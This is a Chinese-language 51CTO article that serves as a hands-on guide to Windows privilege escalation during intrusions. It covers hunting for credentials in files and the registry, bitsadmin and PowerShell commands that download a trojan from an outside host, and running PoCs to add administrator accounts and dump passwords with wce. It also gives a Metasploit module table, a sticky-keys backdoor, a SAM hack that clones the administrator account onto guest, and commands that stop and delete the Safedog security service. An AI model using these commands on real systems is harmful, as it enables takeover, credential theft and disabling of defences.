【51CTO.com原創(chuàng)稿件】在滲透過程中很多人都認(rèn)為Windows提權(quán)很難，其核心是掌握的基礎(chǔ)不夠扎實，當(dāng)然除了極為變態(tài)的權(quán)限設(shè)置的服務(wù)器，基本上筆者遇到的服務(wù)器99%都提權(quán)成功了，本文收集整理一些跟提權(quán)緊密相關(guān)的信息收集技巧和方法，以及如何在kali中搜索可用的漏洞，最后整理了目前可供使用的一些漏洞對應(yīng)msf下的模塊以及操作系統(tǒng)可提權(quán)的版本。

一、Windows提權(quán)信息收集

1. 收集OS名稱和版本信息

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 
systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" 

2. 主機名稱和所有環(huán)境變量

• 主機名稱：hostname
• 環(huán)境變量：SET

3. 查看用戶信息

• 查看所有用戶：net user 或者net1 user
• 查看管理員用戶組：net localgroup administrators或者net1 localgroup administrators
• 查看遠程終端在線用戶：query user 或者quser

4. 查看遠程端口

(1)注冊表查看

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 

(2)通過命令行查看

• 獲取對應(yīng)的PID號：tasklist /svc | find "TermService"
• 通過PID號查找端口：netstat -ano | find "1980"

5. 查看網(wǎng)絡(luò)情況

(1)網(wǎng)絡(luò)配置情況：ipconfig /all

(2)路由器信息： route print

(3)要查看ARP緩存： arp -A

(4)查看網(wǎng)絡(luò)連接： netstat -ano

(5)要查看防火墻規(guī)則：

netsh firewall show config  
netsh firewall show state 

6. 應(yīng)用程序和服務(wù)

(1)要查看服務(wù)的進程ID：tasklist /SVC

(2)已安裝驅(qū)動程序的列表：DRIVERQUERY

(3)已經(jīng)啟動Windows 服務(wù)net start

(4)查看某服務(wù)啟動權(quán)限：sc qc TermService

(5)已安裝程序的列表：wmic product list brief

(6)查看服務(wù)列表：wmic service list brief # Lists services

(7)查看進程列表wmic process list brief # Lists processes

(8)查看啟動程序列表wmic startup list brief # Lists startup items

(9)檢查補丁已安裝的更新和安裝日期

wmic qfe get Caption,De**ion,HotFixID,InstalledOn 

搜索，您可以使用提升權(quán)限的特定漏洞：

wmic qfe get Caption,De**ion,HotFixID,InstalledOn | findstr  /C:"KBxxxxxxx" 

執(zhí)行上面的命令的沒有輸出，意味著那個補丁未安裝。

(10)結(jié)束程序：

wmic process where name="iexplore.exe" call terminate 

7. 檢索敏感文件

dir /b/s password.txt 
dir /b /s *.doc 
dir /b /s *.ppt 
dir /b /s *.xls 
dir /b /s *. docx 
dir /b /s *.xlsx 
dir /b/s config.* filesystem 
findstr /si password *.xml *.ini *.txt  
findstr /si login *.xml *.ini *.txt 

除此之外，您還可以檢查無人值守安裝日志文件。這些文件通常包含base64編碼的密碼。你更可能在大型企業(yè)中，其中單個系統(tǒng)的手動安裝是不切實際的，找到這些文件即可獲取管理員密碼。這些文件的共同位置是：

• C:\sysprep.inf
• C:\sysprep\sysprep.xml
• C:\Windows\Panther\Unattend\Unattended.xml
• C:\Windows\Panther\Unattended.xml

8. 目錄文件操作

(1)列出d:\www的所有目錄：

for /d %i in (d:\www\*) do @echo %i 

(2)把當(dāng)前路徑下文件夾的名字只有1-3個字母的顯示出來：

for /d %i in (???) do @echo %i 

(3)以當(dāng)前目錄為搜索路徑，把當(dāng)前目錄與下面的子目錄的全部EXE文件列出：

for /r %i in (*.exe) do @echo %i 

(4)以指定目錄為搜索路徑，把當(dāng)前目錄與下面的子目錄的所有文件列出

for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i 

(5)顯示a.txt里面的內(nèi)容，因為/f的作用，會讀出a.txt中：

for /f %i in (c:\1.txt) do echo %i 

9. RAR打包

rar a -k -r -s -m3 c:\1.rar d:\wwwroot 

10. php讀文件

c:/php/php.exe "c:/www/admin/1.php" 

11. Windows7及以上的版本操作系統(tǒng)文件下載可以使用的bitsadmin和powershell：

bitsadmin /transfer myjob1 /download /priority normal http://www.antian365.com/lab/4433.exe c:\ma.exe 
powershell (new-object System.Net.WebClient).DownloadFile(' http://www.antian365.com/ma.exe','ma.exe') 

12. 注冊表關(guān)鍵字搜索，password為關(guān)鍵字，可以是vnc等敏感關(guān)鍵字

reg query HKLM /f password /t REG_SZ /s 
reg query HKCU /f password /t REG_SZ /s 

13.系統(tǒng)權(quán)限配置

cacls c:\ 
cacls c:\windows\ma.exe 查看ma.exe的權(quán)限配置 

14.自動收集系統(tǒng)有用信息腳本

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A" 
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html 
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html 
wmic USERACCOUNT list full /format:"%var%" >> out.html 
wmic group list full /format:"%var%" >> out.html 
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html 
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html 
wmic netuse list full /format:"%var%" >> out.html 
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html 
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html 
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html 
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html 
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html 

二、Windows提權(quán)準(zhǔn)備

通過前面的基礎(chǔ)命令以及本章的第二章節(jié)，可以有針對性的對目標(biāo)開展提權(quán)工作，根據(jù)Windows-Exploit-Suggester獲取目前系統(tǒng)可能存在的漏洞。

1. 收集并編譯相關(guān)POC

2. 若操作系統(tǒng)有殺毒軟件以及安全防護軟件，則需要對提權(quán)POC進行免殺，否則進行下一步。

3. 上傳POC

4. 有webshell或者反彈webshell來執(zhí)行命令

5. 搜索漏洞，根據(jù)關(guān)鍵字進行搜索例如MS10-061。

(1)在百度瀏覽器中搜索“MS10-061 site:exploit-db.com”

(2)packetstormsecurity網(wǎng)站搜索

https://packetstormsecurity.com/search/?q=MS16-016

(3)安全焦點，其BugTraq是一個出色的漏洞和exploit數(shù)據(jù)源，可以通過CVE編號，或者產(chǎn)品信息漏洞直接搜索。網(wǎng)址：http://www.securityfocus.com/bid。

三、使用msf平臺搜索可利用POC

1. 搜索poc

在kali中打開msf或者執(zhí)行“/usr/bin/msfconsole”，在出來的命令提示符下使用命令進行搜索：

search ms08 
search ms09 
search ms10 
search ms11 
search ms12 
search ms13 
search ms14 
search ms15 
search ms16 
search ms17 

以上命令將搜索2008年至2017年的所有可用的Windows下的exploit，例如搜索2015年的exploit，如圖1所示。

圖1搜索2015年所有可用的0day

2. 查看相關(guān)漏洞情況

可以通過微軟官方網(wǎng)站查看漏洞對應(yīng)的版本，利用方式為https://technet.microsoft.com/library/security/漏洞號，例如查看ms08-068則其網(wǎng)頁打開方式為：https://technet.microsoft.com/library/security/ms08-068，如圖2所示，如果顯示為嚴(yán)重則表明可以被利用。

圖2微軟官方對應(yīng)版本號

四、實施提權(quán)

執(zhí)行命令。比如可利用poc文件為poc.exe，則可以使用如下的一些命令提權(quán)：

(1)直接執(zhí)行木馬。

poc.exe ma.exe 

(2)添加用戶

poc.exe "net user antian365 1qaz2wsx /add" 
poc.exe "net localgroup administrators antian365 /add" 

(3)獲取明文密碼或者哈希值

poc.exe "wce32.exe -w"  
poc.exe "wce64.exe -w" 
poc.exe "wce32" 

五、相關(guān)資源下載

1. Tools下載

wce下載：

• http://www.ampliasecurity.com/research/windows-credentials-editor/
• http://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
• http://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
• sysinternals ：https://technet.microsoft.com/en-us/sysinternals/bb842062
• mimikatz ：http://blog.gentilkiwi.com/mimikatz
• python ：https://www.python.org/downloads/windows/

2. 搜索漏洞和shellcode

• http://www.exploit-db.com
• http://1337day.com
• http://0day.today
• http://www.securityfocus.com
• http://seclists.org/fulldisclosure/
• http://www.exploitsearch.net
• http://www.securiteam.com
• http://metasploit.com/modules/
• http://securityreason.com
• https://cxsecurity.com/exploit/
• http://securitytracker.com/

六、Windows本地溢出漏洞對應(yīng)表

Windows2003對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

1. 2007年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB935966 |MS07-029  Win2000SP4、Win2003SP1/SP2 exploit/windows/dcerpc/ms07_029_msdns_zonename 
exploit/windows/smb/ms07_029_msdns_zonename 
（2）KB937894| MS07-065 WinxpSP2、Win2000SP4、WinXP-x64-SP2、Win2003SP1/SP2 
exploit/windows/dcerpc/ms07_065_msmq 
（3）KB941568|MS07-064 Win2000SP4  
  exploit/windows/misc/ms07_064_sami 
（4）KB944653|MS07-067 WinXPSP2、WinXP-x64-SP2、Win2003SP1/SP2 

2. 2008年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB958644 |MS08-067 Win2000SP4、WinXP-SP2/SP3、 
WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2 
exploit/windows/smb/ms08_067_netapi 
（2）KB 957097| MS08-068 Win2000SP4、WinXP-SP2/SP3、 
WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2 
exploit/windows/smb/smb_relay  

3. 2009年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB952004|MS09-012 PR Win2003/2008 
（2）KB956572|MS09-012烤肉 
（3）KB970483|MS09-020 IIS6 
（4）KB971657|MS09-041 WinXP、Win2003提權(quán) 
（5）KB975254|MS09-053 IIS5遠程溢出，Windows2000SP4，Win2003及Win2008拒絕服務(wù)。 
（6）KB975517 |MS09-050 Vista、Win2008-32/SP2、Win2008-64/SP2 
exploit/windows/smb/ms09_050_smb2_negotiate_func_index 

4. 2010年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB977165|MS10-015 Vista、Win2003-32-64/SP2、Win2008-32-64/SP2 
exploit/windows/local/ms10_015_kitrap0d 
（2）KB 2347290|MS10-061 Winxp3、Winxp64sp2、Win2003-32-64 SP2、Win2008-32-64 SP2 
（3）KB2360937|MS10-084 Winxp3、Winxp64sp2、Win2003-32-64 SP2 
（4）KB2305420| MS10-092 Win7-32-64、Win2008-32-64、Win2008R2-32-64 
exploit/windows/local/ms10_092_schelevator 
（5）KB2124261|KB2271195  MS10-065 IIS7 

5. 2011年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB2393802|MS11-011 
Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2 
（2）KB2478960|MS11-014 
Winxp32-64-SP3、Win2003-32-64-SP2 
（3）KB2507938|MS11-056 
Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2 
（4）KB2566454|MS11-062 
Winxp32-64-SP3、Win2003-32-64-SP2 
（5）KB2620712|MS11-097 
Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1 
（6）KB2503665|MS11-046 
Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1 
（7）KB2592799|MS11-080 
Winxp-SP3、Win2003-SP2 
exploit/windows/local/ms11_080_afdjoinleaf 

6. 2012年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB2711167| KB2707511|KB2709715|MS12-042  sysret –pid 
Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012 
（2）KB2621440|MS12-020 Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、 

7. 2013年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB2778930|MS13-005 Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012 
exploit/windows/local/ms13_005_hwnd_broadcast 
（2）KB2840221|MS13-046 WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012、Win2012R2 
（3）KB2850851|MS13-053 EPATHOBJ 0day，WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012 
exploit/windows/local/ms13_053_schlamperei 

8. 2014年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB 2914368 |MS14-002 WinXPSP3、WinXP-64-SP2、Win2003-32-64-sp2 
exploit/windows/local/ms_ndproxy 
（2）KB 2916607|MS14-009 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/local/ms14_009_ie_dfsvc 
（3）KB3000061|MS14-058 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/local/ms14_058_track_popup_menu 
（4）KB 2989935|MS14-070 Win2003-32-64-SP2 
exploit/windows/local/ms14_070_tcpip_ioctl 

9. 2015年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB3023266|MS15-001 Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/local/ntapphelpcachecontrol 
（2）KB3025421|MS15_004、Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/local/ms15_004_tswbproxy 
（3）KB3041836|MS15-020、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/smb/ms15_020_shortcut_icon_dllloader 
（4）KB3057191|MS15-051 
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/local/ms15_051_client_copy_image 
（5）KB3077657|MS15-077 
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
（6）KB 3079904|MS15_078 
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/local/ms15_078_atmfd_bof 
（7）KB3079904|MS15-097 
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
exploit/windows/smb/ms15_020_shortcut_icon_dllloader 

10. 2016年對應(yīng)漏洞、編號及其影響系統(tǒng)及msf模塊

（1）KB3134228|MS16-014 Win2008、Win7、Win2012 
（2）KB3124280|MS16-016 WebDAV提權(quán)漏洞，Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64 
exploit/windows/local/ms16_016_webdav 
（3）KB3139914|MS16-032、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64 
exploit/windows/local/ms16_032_secondary_logon_handle_privesc 
Windows 2003 SP2 安裝了MS10-046補丁，可用ms15_020進行溢出 
Windows 2008 SP2 (32 bits)安裝了MS14-027補丁可用ms15_020進行溢出 

七、過安全狗

1. vbs法

將以下代碼保存為1.vbs然后執(zhí)行cscript 1.vbs

Set o=CreateObject( "Shell.Users" ) 
Set z=o.create("user") 
z.changePassword "1qaz2WSX12","" 
z.setting("AccountType")=3 

2. shift后門法

copy C:\sethc.exe C:\windows\system32\sethc.exe  
copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe 

3. for循環(huán)添加帳號法

for /l %%i in (1,1,100) do @net user temp asphxg /add&@net localgroup administrators temp /add 

4. 修改注冊表法

administrator對應(yīng)值是1F4,GUEST是1F5。

(1)使用net1 user guset 1 ,將guest密碼重置為1，無需過問是guest否禁用

(2)執(zhí)行：reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"

導(dǎo)出administrator的注冊表值到某路徑,修改內(nèi)容，將"V"值刪除，只留F值,將1F4修改為1F5,保存。

(3)執(zhí)行regedit /s C:\RECYCLER\1.reg 導(dǎo)入注冊表

就可以使用，guest 密碼1登陸了。

5. 直接修改管理員密碼法，盡量不用這招，實在沒有辦法就用這個。

net user administrator somepwd 

6. 刪除與停止安全狗相關(guān)服務(wù)法

如果是system權(quán)限可以采取以下方法停止安全狗

(1)停止安全狗相關(guān)服務(wù)

net stop    "Safedog Guard Center"  /y 
net stop    "Safedog Update Center" /y 
net stop    "SafeDogCloudHelper"  /y 

(2)直接刪除SafeDogGuardCenter服務(wù)

sc stop "SafeDogGuardCenter"  
sc config "SafeDogGuardCenter" start= disabled  
sc delete "SafeDogGuardCenter" 
 
sc stop " SafeDogUpdateCenter"  
sc config " SafeDogUpdateCenter" start= disabled  
sc delete " SafeDogUpdateCenter" 
 
sc stop " SafeDogCloudHelper"  
sc config " SafeDogCloudHelper" start= disabled  
sc delete " SafeDogCloudHelper" 

【51CTO原創(chuàng)稿件，合作站點轉(zhuǎn)載請注明原文作者和出處為51CTO.com】